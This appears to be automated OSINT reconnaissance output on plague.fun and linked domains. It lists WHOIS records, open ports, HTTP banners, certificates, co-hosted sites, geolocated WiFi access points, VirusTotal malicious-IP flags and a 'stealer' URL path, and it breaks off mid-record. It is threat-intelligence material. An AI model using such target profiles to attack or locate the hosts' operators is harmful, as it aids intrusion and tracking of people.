Date: 2022-02-13T11:50:45Z Creation Date: 2022-02-08T11:50:07Z Registry Expiry Date: 2023-02-08T11:50:07Z Registrar: NameCheap, Inc. Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.9854014545 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Capital Region Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: IS Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: dns1.registrar-servers.com Name Server: dns2.registrar-servers.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:32:17Z <<< For more information on Whois status codes, please visit https://icann.org/epp Terms of Use: Identity Digital Inc. provides this Whois service for information purposes, and to assist persons in obtaining information about or related to a domain name registration record. Identity Digital does not guarantee its accuracy. Users accessing the Identity Digital Whois service agree to use the data only for lawful purposes, and under no circumstances may this data be used to: a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the registrar's own existing customers and b) enable high volume, automated, electronic processes that send queries or data to the systems of Identity Digital or any ICANN-accredited registrar, except as reasonably necessary to register domain names or modify existing registrations. When using the Identity Digital Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/ Identity Digital Inc. reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy. Socket not responding: timed out 2022-12-18 00:20:42 Physical Location No Censys 0 0 1 0 None Campinas, Sao Paulo, Brazil, South America 4.228.83.86 2022-12-18 00:18:25 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.10:80 188.114.97.0/24 2022-12-18 00:21:34 Open TCP Port No Censys 0 0 2 0 None 104.21.19.243:8443 104.21.19.243 2022-12-18 00:24:58 Affiliate - IP Address No DNS Look-aside 1 0 3 0 None 90.116.149.188 90.116.149.183 2022-12-18 00:02:45 SSL Certificate Expiring Yes CertSpotter 0 0 1 0 None 2022-12-19 21:18:05 misogyny.wtf 2022-12-18 00:08:52 Open TCP Port No LeakIX 0 0 2 0 None 104.21.28.240:443 104.21.28.240 2022-12-18 00:06:40 Open TCP Port No Pulsedive 0 0 2 0 None 188.114.97.1:8443 188.114.97.1 2022-12-18 00:06:19 Similar Domain Yes TLD Searcher 1 0 1 0 None plague.cx plague.fun 2022-12-18 00:09:53 Co-Hosted Site No HackerTarget 0 0 2 0 None brasfaberk.ga 172.67.147.230 2022-12-18 00:22:04 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Te": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8"}, "Te": ["chunked"], "Content_Type": ["text/html"]} 90.116.166.104 2022-12-18 00:06:06 Affiliate - Domain Name No DNS Resolver 0 0 2 0 None amenworld.com ns2.amenworld.com 2022-12-18 00:09:46 Co-Hosted Site No HackerTarget 0 0 2 0 None assets.auroramediagroup.xyz 172.67.147.230 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None grasshopper2 (Net ID: 00:01:38:5A:88:28) 37.780462,-122.390564 2022-12-18 00:09:55 Hosting Provider No Hosting Provider Identifier 0 0 2 0 None Cloudflare Inc: https://www.cloudflare.com/ 104.21.7.179 2022-12-18 00:09:48 Vulnerability - CVE Medium Yes Tool - testssl.sh 0 1 2 0 None CVE-2016-2183 https://nvd.nist.gov/vuln/detail/CVE-2016-2183 Score: 5.0 Description: The DES and Triple DES ciphers, as used in the TLS, SSH, and IPSec protocols and other protocols and products, have a birthday bound of approximately four billion blocks, which makes it easier for remote attackers to obtain cleartext data via a birthday attack against a long-duration encrypted session, as demonstrated by an HTTPS session using Triple DES in CBC mode, aka a "Sweet32" attack. 188.114.96.0 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None onlinenewbankbcp.viiabcp.repl.co 34.149.204.188 2022-12-18 00:21:37 Software Used Yes Censys 0 0 2 0 None PalletsProjects Werkzeug 2.2.2 20.226.83.185 2022-12-18 00:21:06 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["77ade072690313ce-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": [""], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 172.67.147.230 2022-12-18 00:21:44 Open TCP Port No Censys 0 0 2 0 None 2606:4700:3031::6815:7b3:80 2606:4700:3031::6815:7b3 2022-12-18 00:03:03 SSL Certificate - Raw Data No Certificate Transparency 1 0 1 0 None Certificate: Data: Version: 3 (0x2) Serial Number: 03:5f:2b:c4:e2:52:ac:ba:5b:55:25:2b:3c:57:78:0c:6b:4f Signature Algorithm: sha256WithRSAEncryption Issuer: C=US, O=Let's Encrypt, CN=R3 Validity Not Before: Apr 9 16:42:21 2022 GMT Not After : Jul 8 16:42:20 2022 GMT Subject: CN=stream.plague.fun Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public-Key: (2048 bit) Modulus: 00:f0:74:08:94:b1:0e:3a:f5:ab:5d:27:9f:a1:13: 26:4a:b8:88:b4:cd:16:65:28:29:5d:0c:65:22:96: 16:e9:20:24:42:3d:6d:35:0e:c1:28:8c:4a:28:75: c3:5b:63:81:00:5f:79:35:b2:8c:de:87:22:b0:ad: a6:67:62:40:d8:17:58:b3:75:0e:b6:2f:73:f2:ea: eb:e0:8f:76:26:50:9a:16:11:75:b8:95:2c:97:e5: b9:e5:63:e7:51:d3:eb:e7:99:34:6a:cf:cc:fb:cf: db:aa:47:5b:d5:56:1a:8d:93:2c:fd:ff:26:75:37: d0:62:e4:63:b7:38:a8:b2:e3:d7:82:92:52:ce:b0: af:e9:42:c7:ca:4f:21:55:20:92:35:54:9c:65:7a: ce:69:96:a3:18:10:90:ac:b1:94:6c:06:cb:1d:e6: f3:8c:63:be:4d:c3:b6:5c:e7:73:eb:aa:34:c4:16: b2:55:9f:e1:5e:c9:6e:3c:a6:a1:4e:ce:ba:1c:93: 9b:8f:97:87:77:b0:cc:86:0e:ec:a3:31:e9:6a:17: 0a:2c:ea:72:83:72:e9:ad:a4:a9:77:f3:4c:21:11: 4e:be:f0:d4:f6:9c:70:8a:00:15:78:65:11:81:45: 14:10:49:bf:49:44:94:90:4c:18:e2:6e:b5:c1:88: 5e:37 Exponent: 65537 (0x10001) X509v3 extensions: X509v3 Key Usage: critical Digital Signature, Key Encipherment X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: C9:18:99:93:EB:0E:8F:DB:EF:08:28:03:69:26:F5:7B:25:61:0A:39 X509v3 Authority Key Identifier: keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6 Authority Information Access: OCSP - URI:http://r3.o.lencr.org CA Issuers - URI:http://r3.i.lencr.org/ X509v3 Subject Alternative Name: DNS:stream.plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate Poison: critical NULL Signature Algorithm: sha256WithRSAEncryption 69:40:ed:22:fe:60:b0:02:ad:3a:4e:78:f4:bb:89:96:9b:b5: ab:72:8b:0b:df:3a:e4:b1:98:69:7b:5e:f5:09:60:f2:7d:89: d6:4c:d4:92:b7:7b:25:4a:8d:f7:24:18:e5:1e:dd:40:a6:e9: d8:00:0d:09:02:72:b2:7c:1b:ae:00:0b:34:5c:a9:e8:f3:b5: 24:0c:54:57:a3:b2:38:72:b7:2c:e5:ec:06:fe:84:a5:06:77: 1e:75:01:de:a0:8e:a6:1c:0f:c3:1f:cf:a5:46:73:df:e8:29: c9:f2:53:1b:60:56:ef:a2:a8:f8:bb:1d:d7:86:fe:80:75:97: e4:9c:94:44:f3:55:56:85:31:11:bc:51:28:73:2d:c4:06:9c: e3:59:07:bd:ef:a5:9a:4d:8c:29:86:3c:cf:72:5c:a8:09:99: a0:c1:3a:ca:77:e1:33:db:d8:bc:a1:0a:ed:05:40:f7:c4:fd: 61:82:b2:93:37:d2:a2:93:53:4d:c2:46:10:31:30:86:f7:2c: 13:5e:16:4e:f1:da:57:ba:4c:8f:70:fe:9c:d4:4d:8d:48:4c: 19:b9:9c:71:58:e6:d3:91:96:76:59:42:f8:54:b6:86:52:b4: 14:64:b1:08:ba:2f:27:33:22:9f:33:14:ec:1e:dd:aa:f2:97: b7:2b:3c:4f plague.fun 2022-12-18 00:27:03 Malicious IP Address Yes MetaDefender 0 1 2 0 None webroot.com [104.21.27.242] 104.21.27.242 2022-12-18 00:21:20 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77acf89f69089b33-FRA Content-Encoding: gzip 188.114.97.1 2022-12-18 00:21:47 Netblock IPv6 Membership No Censys 0 0 2 0 None 2606:4700:3032::/48 2606:4700:3032::ac43:8925 2022-12-18 00:08:30 Open TCP Port No LeakIX 0 0 1 0 None plague.fun:80 plague.fun 2022-12-18 00:37:11 Malicious Affiliate IP Address Yes VirusTotal 0 0 3 0 None VirusTotal [81.88.52.241] https://www.virustotal.com/en/ip-address/81.88.52.241/information/ 81.88.52.241 2022-12-18 00:02:58 Raw Data from RIRs No Tool - WAFW00F 0 0 1 0 None [{"url": "https://zerotwo-best-waifu.online", "firewall": "Generic", "detected": true, "manufacturer": "Unknown"}] zerotwo-best-waifu.online 2022-12-18 00:03:02 Affiliate - IP Address No DNS Look-aside 1 0 2 0 None 90.116.166.99 90.116.166.104 2022-12-18 00:09:36 Co-Hosted Site No HackerTarget 0 0 2 0 None stadverket.ru.com 104.21.28.240 2022-12-18 00:08:40 BGP AS Membership No RIPE 0 0 3 0 None 39729 81.88.48.0/20 2022-12-18 00:21:17 Open TCP Port No Censys 0 0 2 0 None 188.114.96.1:2053 188.114.96.1 2022-12-18 00:21:09 Open TCP Port No Censys 0 0 2 0 None 188.114.96.0:2053 188.114.96.0 2022-12-18 00:21:02 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77b30f673b0f226e-ORD Content-Encoding: gzip 104.21.28.240 2022-12-18 00:03:15 Affiliate - Internet Name No DNS Resolver 0 0 3 0 None lfbn-nic-1-332-100.w90-116.abo.wanadoo.fr 90.116.166.100 2022-12-18 00:23:31 Raw DNS Records No DNS Raw Records 0 0 2 0 None smtp.zerotwo-best-waifu.online. 900 IN CNAME smtp-fr.securemail.pro. smtp.zerotwo-best-waifu.online 2022-12-18 00:10:20 Vulnerability - CVE Medium Yes Tool - testssl.sh 0 1 2 0 None CVE-2016-2183 https://nvd.nist.gov/vuln/detail/CVE-2016-2183 Score: 5.0 Description: The DES and Triple DES ciphers, as used in the TLS, SSH, and IPSec protocols and other protocols and products, have a birthday bound of approximately four billion blocks, which makes it easier for remote attackers to obtain cleartext data via a birthday attack against a long-duration encrypted session, as demonstrated by an HTTPS session using Triple DES in CBC mode, aka a "Sweet32" attack. 188.114.97.0 2022-12-18 00:21:06 Software Used Yes Censys 0 0 2 0 None CloudFlare CloudFlare Load Balancer 172.67.147.230 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None myLGNetFBC6 (Net ID: 00:01:36:5A:FB:C4) 37.780462,-122.390564 2022-12-18 00:03:05 Internet Name - Unresolved No DNS Resolver 0 0 2 0 None api.plague.fun Certificate: Data: Version: 3 (0x2) Serial Number: 04:d0:d1:a1:cc:7c:20:ed:eb:01:fc:85:dd:45:cc:e5:1b:da Signature Algorithm: sha256WithRSAEncryption Issuer: C=US, O=Let's Encrypt, CN=R3 Validity Not Before: Oct 23 15:38:18 2022 GMT Not After : Jan 21 15:38:17 2023 GMT Subject: CN=api.plague.fun Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:30:c0:bf:22:a0:03:97:7c:f3:8c:17:0c:53:80: 20:b4:f6:13:23:b9:ef:35:89:44:f0:e2:fc:48:0d: f6:4e:fb:2b:50:6e:fe:d0:e3:1f:5d:4b:89:9f:9c: 63:33:04:0b:09:42:86:ef:02:27:68:3a:fa:66:ad: 7a:1c:4b:e5:f1 ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 04:E3:72:52:84:D9:47:FF:A7:25:8B:BE:55:2A:4D:59:86:DF:3E:75 X509v3 Authority Key Identifier: keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6 Authority Information Access: OCSP - URI:http://r3.o.lencr.org CA Issuers - URI:http://r3.i.lencr.org/ X509v3 Subject Alternative Name: DNS:api.plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate SCTs: Signed Certificate Timestamp: Version : v1 (0x0) Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C: 5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99 Timestamp : Oct 23 16:38:18.729 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:45:02:21:00:A9:DD:3E:19:3D:08:47:5F:9B:B1:90: AB:C2:AD:E2:91:05:EF:EF:95:99:23:9E:12:BB:18:C5: F2:98:2C:7F:FF:02:20:30:69:42:8A:34:18:68:E8:E1: F4:E4:D9:94:CF:C5:34:EF:39:1A:43:D9:9C:47:8E:41: 10:2C:6F:3A:20:E3:E1 Signed Certificate Timestamp: Version : v1 (0x0) Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9: 03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E Timestamp : Oct 23 16:38:19.220 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:44:02:20:58:B9:B1:8C:CD:43:D6:1D:83:3C:11:03: 67:28:6C:A1:33:53:B6:B9:D3:EF:70:AC:2C:55:58:71: 2E:86:6B:B5:02:20:79:E1:6E:03:7A:1D:27:C9:CF:88: 7F:0A:27:1B:AC:A1:FC:FF:D1:EB:63:9F:F0:A2:83:F0: 8C:43:7D:35:95:3E Signature Algorithm: sha256WithRSAEncryption b3:8e:0e:18:93:0e:cb:14:85:53:38:63:b9:c4:c0:d7:e4:4e: dc:9d:12:7a:89:0c:2f:98:28:52:78:91:27:0f:94:c1:fa:fe: 10:3d:ba:69:8a:b2:78:c5:ad:24:ba:d2:9e:b2:55:6d:45:b4: 73:54:49:49:bf:c7:19:04:52:d4:e1:93:fc:98:b7:97:7c:7f: 26:55:42:83:ef:fc:4b:d8:32:e7:fb:cc:ab:3c:14:ef:c7:6f: e3:45:ff:53:ca:92:99:e1:1c:d2:23:29:21:4a:53:d0:24:3e: ff:cb:df:0f:ef:c6:99:94:bf:6e:64:6f:36:d9:fd:b9:c8:0d: 60:6b:96:9b:c3:95:60:3d:16:6c:16:b8:cb:7a:58:0c:af:e3: 50:60:ca:2b:a1:72:ab:fe:b3:ff:6e:cd:af:8d:4b:90:c4:9b: 45:cb:c0:86:ac:fd:47:ad:dd:ab:16:9d:80:9d:2c:84:4e:c7: bd:61:2f:7c:dc:e9:b5:ec:dd:68:eb:2e:6a:4b:85:4f:35:de: 17:7f:39:da:a5:e7:f3:0f:03:a8:5a:7c:17:87:19:e0:84:84: 02:3d:34:70:83:8a:92:0d:41:cf:d2:cd:4e:45:68:f0:4c:c1: b4:46:ea:13:51:52:23:22:dd:ba:36:a7:32:92:76:b7:68:de: 7a:b8:fb:be 2022-12-18 00:22:28 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.128:8080 188.114.97.0/24 2022-12-18 00:03:07 Affiliate - IP Address No DNS Look-aside 1 0 2 0 None 34.149.204.191 34.149.204.188 2022-12-18 00:10:05 Linked URL - Internal No URLScan.io 1 0 1 0 None https://zerotwo-best-waifu.online/778112985743251/wap/shatlegay/stealer123365 zerotwo-best-waifu.online 2022-12-18 00:20:54 Malicious IP Address Yes VirusTotal 0 1 2 0 None VirusTotal [34.149.204.188] https://www.virustotal.com/en/ip-address/34.149.204.188/information/ 34.149.204.188 2022-12-18 00:08:45 Internet Name - Unresolved No DNS Resolver 0 0 2 0 None api.plague.fun {u'Services': [{u'protocol': u'https', u'event_type': u'service', u'ip': u'188.114.96.3', u'vendor': u'', u'port': u'443', u'transport': [u'tcp', u'tls', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'188.114.96.0/22'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee98731b5c07e2a0605f5df67b41e33bc1553b0a055e42aa7d864fa', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'404 Not Found', u'url': u'', u'header': {u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'TLS_AES_128_GCM_SHA256', u'jarm': u'00000000000000000000000000000000000000000000000000000000000000', u'certificate': {u'domain': [u'*.plague.fun', u'plague.fun'], u'cn': u'*.plague.fun', u'valid': True, u'not_after': u'2023-01-28T18:19:30Z', u'key_size': 256, u'issuer_name': u'E1', u'fingerprint': u'c8334a1e1d54310e254140e075b554abf7eb6eee3a8330536bfb363810204efa', u'key_algo': u'ECDSA', u'not_before': u'2022-10-30T18:19:31Z'}, u'enabled': True, u'detected': False, u'version': u'TLSv1.3'}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'NL-NH', u'country_iso_code': u'NL', u'city_name': u'Amsterdam', u'location': {u'lat': 52.3759, u'lon': 4.8975}, u'country_name': u'Netherlands', u'continent_name': u'Europe', u'region_name': u'North Holland'}, u'host': u'atlas.plague.fun', u'summary': u'Date: Fri, 04 Nov 2022 14:12:30 GMT\r\nContent-Type: text/html; charset=utf-8\r\nTransfer-Encoding: chunked\r\nConnection: close\r\nexpect-ct: max-age=2592000, report-uri="https://sentry.repl.it/api/10/security/?sentry_key=615192fd532445bfbbbe966cd7131791"\r\nreplit-cluster: global\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {"endpoints":[{"url":"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=6ClqhVn5nSDtkklqr%2BmnSCvD9r8PWQF%2F88kiAg2dn43%2F57%2B43abjyeldwgPSlVgPWGi3Lnc3kXWmGp3tptIEJ4%2F6XT%2FcyMqiw%2FdFJnk7r%2FEt7i4KjB2lSsRxWQP2Geqr%2F2Jf"}],"group":"cf-nel","max_age":604800}\r\nNEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}\r\nServer: cloudflare\r\nCF-RAY: 764df1e8095ab83a-AMS\r\nalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400\r\n\nPage title: 404 Not Found\n\ncf\r\n\n\n404 Not Found\n

Not Found

\n

The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.

\n\r\n0\r\n\r\n', u'time': u'2022-11-04T14:12:29.195922804Z'}, {u'protocol': u'https', u'event_type': u'service', u'ip': u'188.114.97.9', u'vendor': u'', u'port': u'443', u'transport': [u'tcp', u'tls', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'188.114.96.0/22'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee987310280cb7d632b5845847c2f419e2c9ddaaedfc99512844cb8', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'', u'url': u'', u'header': {u'content-length': u'73', u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'TLS_AES_128_GCM_SHA256', u'jarm': u'00000000000000000000000000000000000000000000000000000000000000', u'certificate': {u'domain': [u'*.plague.fun', u'plague.fun'], u'cn': u'*.plague.fun', u'valid': True, u'not_after': u'2022-11-30T17:51:41Z', u'key_size': 256, u'issuer_name': u'E1', u'fingerprint': u'bbb95c587c22383e98c0c76edbbfd861351749a07ae39c9d4d43a5aee78540b7', u'key_algo': u'ECDSA', u'not_before': u'2022-09-01T17:51:42Z'}, u'enabled': True, u'detected': False, u'version': u'TLSv1.3'}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'NL-NH', u'country_iso_code': u'NL', u'city_name': u'Amsterdam', u'location': {u'lat': 52.3759, u'lon': 4.8975}, u'country_name': u'Netherlands', u'continent_name': u'Europe', u'region_name': u'North Holland'}, u'host': u'api.plague.fun', u'summary': u'Date: Sun, 23 Oct 2022 16:38:46 GMT\r\nContent-Type: text/plain; charset=utf-8\r\nContent-Length: 73\r\nConnection: close\r\naccess-control-allow-origin: *\r\nexpect-ct: max-age=2592000, report-uri="https://sentry.repl.it/api/10/security/?sentry_key=615192fd532445bfbbbe966cd7131791"\r\nreplit-cluster: global\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {"endpoints":[{"url":"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=wmCFw%2FYqj8604vOuoCeM2hBuifGq6KtOhHeKBOWsRA%2B54NPwmSqyfGIPk6jRMMW5tGyxQs7ve%2BDWPe8fFcjhv%2Fa9mWikvGufQUCzHDENLFGws4wis6UMHPbfqGd6lapb9w%3D%3D"}],"group":"cf-nel","max_age":604800}\r\nNEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}\r\nServer: cloudflare\r\nCF-RAY: 75ebe7a87fadcaa9-HAM\r\nalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400\r\n\n\n# Roses are red\n\n# Violets are blue\n\n# You are a skid\n\n# Nobody likes you', u'time': u'2022-10-23T16:38:44.953959619Z'}, {u'protocol': u'http', u'event_type': u'service', u'ip': u'2a06:98c1:3120::3', u'vendor': u'', u'port': u'80', u'transport': [u'tcp', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'2a06:98c1:3120:0:0:0:0:0/46'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee98731735c0f301524bacadf25fc68625d295855d87ce36c4e05e9', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'', u'url': u'', u'header': {u'location': u'https://plague.fun/', u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'', u'jarm': u'', u'certificate': {u'domain': None, u'cn': u'', u'valid': False, u'not_after': u'0001-01-01T00:00:00Z', u'key_size': 0, u'issuer_name': u'', u'fingerprint': u'', u'key_algo': u'', u'not_before': u'0001-01-01T00:00:00Z'}, u'enabled': False, u'detected': False, u'version': u''}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'', u'country_iso_code': u'US', u'city_name': u'', u'location': {u'lat': 37.751, u'lon': -97.822}, u'country_name': u'United States', u'continent_name': u'North America', u'region_name': u''}, u'host': u'plague.fun', u'summary': u'Date: Sun, 30 Oct 2022 19:20:51 GMT\r\nTransfer-Encoding: chunked\r\nConnection: close\r\nCache-Control: max-age=3600\r\nExpires: Sun, 30 Oct 2022 20:20:51 GMT\r\nLocation: https://plague.fun/\r\nReport-To: {"endpoints":[{"url":"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=p0niSQHcHJYrt94pMK%2FWr74YUZs%2BvcDsHR4GVggs7kEqo8GFbUOH1p8yewavJYpzdeRdgmQf7L%2B0bs%2B3tFNCNgz%2Fk3qh0PO2FjpU4p6sNMeUApthX75f68Yi1FZpoayqhhh1HsoOYqPg"}],"group":"cf-nel","max_age":604800}\r\nNEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}\r\nServer: cloudflare\r\nCF-RAY: 762682b70a0ccabd-HAM\r\nalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400\r\n\n\n0\r\n\r\n', u'time': u'2022-10-30T19:20:50.988305392Z'}, {u'protocol': u'https', u'event_type': u'service', u'ip': u'188.114.97.3', u'vendor': u'', u'port': u'443', u'transport': [u'tcp', u'tls', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'188.114.96.0/22'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': 